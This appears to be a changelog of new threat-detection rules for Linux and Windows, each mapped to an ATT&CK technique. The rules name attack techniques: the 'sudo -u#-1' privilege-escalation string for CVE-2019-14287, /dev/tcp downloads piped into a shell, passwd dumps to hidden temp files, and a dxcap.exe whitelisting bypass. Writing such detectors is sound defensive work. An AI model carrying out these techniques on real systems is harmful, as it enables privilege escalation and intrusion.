CREATED: NIX-PRIVILEGE-ESCALATION-SUDO-U (#2124)
sudo with the following command lines:
sudo -u#-1 or
Which indicate the attempted exploitation of CVE-2019-14287.
CREATED: NIX-SHELL-DEV-TCP-UP (#2177)
This detector identifies the use of TCP sockets (
/dev/tcp) to connect to a remote IP address, download files and redirect the remotely hosted files into a shell for execution. This method of connecting to a remote host with TCP sockets is an alternative technique to download files and behaves similarly to wget or curl.
ATT&CK Technique T1190
CREATED: NIX-PASSWD-OUTPUT-HIDDEN-TEMP (#2211)
This detector identifies dumping the
passwd file to the
tmp directory within a hidden directory or as a hidden file. Adversaries utilize these files and directories for reconnaissance.
ATT&CK Technique T1087
CREATED: WIN-DXCAP-APPWHITELIST-BYPASS (#2234)
The DirectX diagnostics and debugger tool (
dxcap.exe) included with Visual Studio can be used to bypass application whitelisting. This detector identifies commands which may exploit this technique.
ATT&CK Technique T1218
CREATED: WIN-SCHTASK-TASKNAME-LIKELY-RANDOM (#2245)
This detector identifies the creation of scheduled task names that have a low trigram frequency score. The low trigram frequency score indicates that the scheduled task is abnormal and randomly named. Randomly named scheduled tasks are a common artifact of known malware families such as Dridex and ThreadKit.
ATT&CK Technique T1053